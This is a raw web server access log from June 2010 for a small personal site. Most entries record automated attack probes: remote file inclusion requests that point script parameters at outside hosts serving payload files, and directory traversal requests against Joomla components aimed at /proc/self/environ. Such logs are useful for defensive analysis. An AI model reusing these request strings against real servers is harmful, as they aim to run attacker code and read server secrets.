89.238.72.218 - - [29/Jun/2010:00:54:09 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
67.205.67.73 - - [29/Jun/2010:00:54:14 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [29/Jun/2010:00:54:15 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.30.129.57 - - [29/Jun/2010:00:54:21 -0500] "GET /logs//linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:00:54:21 -0500] "GET //linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:00:54:21 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:00:54:22 -0500] "GET //linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:00:54:22 -0500] "GET /logs//linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:00:54:22 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:00:55:10 -0500] "GET /logs/access_log.1276819200%20%20//linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:00:55:14 -0500] "GET /logs/access_log.1276819200%20%20//linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.142.75.205 - - [29/Jun/2010:01:01:38 -0500] "GET /language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
174.142.75.205 - - [29/Jun/2010:01:01:38 -0500] "GET /logs/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
174.142.75.205 - - [29/Jun/2010:01:01:38 -0500] "GET /logs/access_log.1277164800/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
65.254.36.102 - - [29/Jun/2010:01:09:27 -0500] "GET /logs/access_log.1274054400//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
65.254.36.102 - - [29/Jun/2010:01:09:27 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
65.254.36.102 - - [29/Jun/2010:01:09:27 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.121.216.99 - - [29/Jun/2010:01:15:52 -0500] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
201.20.37.144 - - [29/Jun/2010:01:17:03 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
201.20.37.144 - - [29/Jun/2010:01:17:03 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
201.20.37.144 - - [29/Jun/2010:01:17:03 -0500] "GET /logs/access_log.1276473600/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
67.195.112.180 - - [29/Jun/2010:01:21:18 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.155.49.192 - - [29/Jun/2010:01:31:10 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
94.155.49.192 - - [29/Jun/2010:01:31:11 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.155.49.192 - - [29/Jun/2010:01:31:12 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [29/Jun/2010:01:39:22 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.199.198 - - [29/Jun/2010:01:40:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [29/Jun/2010:01:40:49 -0500] "GET /logs/access_log.1158192000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.171.37.206 - - [29/Jun/2010:01:43:24 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:01:43:24 -0500] "GET /logs/access_log.1276473600/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:01:43:24 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
67.195.112.180 - - [29/Jun/2010:01:50:21 -0500] "GET /artwork/paintings.htm HTTP/1.0" 200 2300 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.48.66 - - [29/Jun/2010:01:50:39 -0500] "GET /logs/access_log.1266710400//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.52.48.66 - - [29/Jun/2010:01:50:39 -0500] "GET //ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.52.48.66 - - [29/Jun/2010:01:50:39 -0500] "GET /logs//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.52.48.66 - - [29/Jun/2010:01:51:10 -0500] "GET /logs//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.52.48.66 - - [29/Jun/2010:01:51:10 -0500] "GET //ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.52.48.66 - - [29/Jun/2010:01:51:10 -0500] "GET /logs/access_log.1266710400//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.2.24.199 - - [29/Jun/2010:01:55:20 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.0 ( .NET CLR 3.5.30729)"
67.159.44.97 - - [29/Jun/2010:01:57:03 -0500] "GET //linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Casper Bot Search"
67.159.44.97 - - [29/Jun/2010:01:57:03 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 327 "-""Casper Bot Search"
67.159.44.97 - - [29/Jun/2010:01:57:03 -0500] "GET /logs//linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 303 "-""Casper Bot Search"
67.159.44.97 - - [29/Jun/2010:01:58:51 -0500] "GET //linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Casper Bot Search"
67.159.44.97 - - [29/Jun/2010:01:58:51 -0500] "GET /logs//linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 303 "-""Casper Bot Search"
67.159.44.97 - - [29/Jun/2010:01:58:51 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 327 "-""Casper Bot Search"
87.250.252.241 - - [29/Jun/2010:01:58:52 -0500] "GET /logs/access_log.1274832000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.159.44.97 - - [29/Jun/2010:01:59:16 -0500] "GET /logs/access_log.1276819200%20%20//linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 327 "-""Casper Bot Search"
67.159.44.97 - - [29/Jun/2010:02:01:18 -0500] "GET /logs/access_log.1276819200%20%20//linkadmin.php?page=http://elsafwa.net/wp-content/uploads/painted/Ckrid1.txt?? HTTP/1.1" 404 327 "-""Casper Bot Search"
91.82.250.167 - - [29/Jun/2010:02:14:05 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:02:14:05 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.82.250.167 - - [29/Jun/2010:02:14:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
67.228.107.2 - - [29/Jun/2010:02:15:18 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [29/Jun/2010:02:15:18 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [29/Jun/2010:02:15:18 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [29/Jun/2010:02:21:12 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [29/Jun/2010:02:21:12 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [29/Jun/2010:02:21:12 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
213.171.37.206 - - [29/Jun/2010:02:38:20 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:02:38:20 -0500] "GET /logs/access_log.1276473600/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
213.171.37.206 - - [29/Jun/2010:02:38:20 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
67.205.67.73 - - [29/Jun/2010:02:38:29 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/3.0 (OS/2; U)"
67.205.67.73 - - [29/Jun/2010:02:38:30 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/3.0 (OS/2; U)"
93.186.192.124 - - [29/Jun/2010:02:41:30 -0500] "GET /logs/news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:41:30 -0500] "GET /logs/access_log.1274572800%20%20/news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:41:30 -0500] "GET /logs/news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:41:30 -0500] "GET /logs/access_log.1274572800%20%20/news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:41:30 -0500] "GET /news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:41:30 -0500] "GET /news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:42:08 -0500] "GET /news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:42:08 -0500] "GET /logs/news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:02:42:08 -0500] "GET /logs/access_log.1274572800%20%20/news_detail.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
94.155.49.192 - - [29/Jun/2010:02:50:25 -0500] "GET /logs/access_log.1274054400//index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
94.155.49.192 - - [29/Jun/2010:02:50:26 -0500] "GET //index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.155.49.192 - - [29/Jun/2010:02:50:27 -0500] "GET /logs//index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
94.155.49.192 - - [29/Jun/2010:02:50:32 -0500] "GET /logs/access_log.1274054400//index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
94.155.49.192 - - [29/Jun/2010:02:50:33 -0500] "GET //index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.155.49.192 - - [29/Jun/2010:02:50:34 -0500] "GET /logs//index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
94.247.178.153 - - [29/Jun/2010:02:59:15 -0500] "GET /logs/access_log.1274572800/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.178.153 - - [29/Jun/2010:02:59:19 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.178.153 - - [29/Jun/2010:02:59:21 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.805"
67.195.112.180 - - [29/Jun/2010:03:00:48 -0500] "GET /logs/access_log.1268870400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.243.214.52 - - [29/Jun/2010:03:03:00 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
195.168.126.12 - - [29/Jun/2010:03:03:44 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:44 -0500] "GET /logs/access_log.1277251200%20%20//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:44 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:56 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:56 -0500] "GET /logs/access_log.1277251200%20%20//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:56 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:59 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:59 -0500] "GET /logs/access_log.1277251200%20%20//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:03:59 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:04 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:04 -0500] "GET /logs/access_log.1277251200%20%20//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:04 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
94.247.178.153 - - [29/Jun/2010:03:04:16 -0500] "GET /logs/access_log.1274832000/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
195.168.126.12 - - [29/Jun/2010:03:04:26 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:26 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:26 -0500] "GET /logs/access_log.1277251200//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:27 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:27 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:27 -0500] "GET /logs/access_log.1277251200//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:30 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:30 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:30 -0500] "GET /logs/access_log.1277251200//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:35 -0500] "GET /logs/access_log.1277251200//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:36 -0500] "GET //nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.168.126.12 - - [29/Jun/2010:03:04:36 -0500] "GET /logs//nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.205.67.73 - - [29/Jun/2010:03:08:10 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [29/Jun/2010:03:08:10 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
87.250.252.241 - - [29/Jun/2010:03:09:53 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.112.180 - - [29/Jun/2010:03:12:54 -0500] "GET /logs/access_log.1215302400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.186.192.124 - - [29/Jun/2010:03:13:49 -0500] "GET /logs/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:13:49 -0500] "GET /logs/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:13:49 -0500] "GET /logs/access_log.1274572800%20%20/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:13:50 -0500] "GET /logs/access_log.1274572800%20%20/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:13:50 -0500] "GET /old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:13:50 -0500] "GET /old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:14:07 -0500] "GET /logs/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:14:07 -0500] "GET /old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:14:07 -0500] "GET /logs/access_log.1274572800%20%20/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:14:21 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:14:21 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:03:14:42 -0500] "GET /logs/access_log.1274572800/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.93.149.1 - - [29/Jun/2010:03:15:19 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.243.214.52 - - [29/Jun/2010:03:18:41 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
84.243.214.52 - - [29/Jun/2010:03:18:42 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
84.243.214.52 - - [29/Jun/2010:03:18:42 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
195.93.149.1 - - [29/Jun/2010:03:27:42 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.93.149.1 - - [29/Jun/2010:03:27:42 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
